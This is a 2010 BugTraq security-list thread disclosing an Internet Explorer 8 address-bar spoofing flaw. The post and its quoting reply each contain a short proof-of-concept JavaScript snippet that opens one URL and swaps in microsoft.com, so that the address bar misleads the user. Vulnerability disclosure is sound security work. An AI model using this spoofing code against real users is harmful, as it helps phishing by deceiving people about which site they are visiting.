BugTraq
Back to list
|
Post reply
Internet Explorer 8.0 Address Bar Spoofing Vulnerability
Jul 24 2010 11:08AM
info securitylab ir
(1 replies)
Spoof Code:
<script>
function Spoof() {
oc=window.open('http://www.securitylab.ir/', '','location=1');
oc.location.replace('http://www.microsoft.com/');
}
</script>
<p align="center">
<a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p>
Discovered by: Pouya Daneshmand
http://Securitylab.ir/Advisories
[ reply ]
Re: Internet Explorer 8.0 Address Bar Spoofing Vulnerability
Jul 26 2010 04:30PM
Shreyas Zare (shreyas secfence com)
Privacy Statement
Copyright 2010, SecurityFocus
<script>
function Spoof() {
oc=window.open('http://www.securitylab.ir/', '','location=1');
oc.location.replace('http://www.microsoft.com/');
}
</script>
<p align="center">
<a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p>
Discovered by: Pouya Daneshmand
http://Securitylab.ir/Advisories
[ reply ]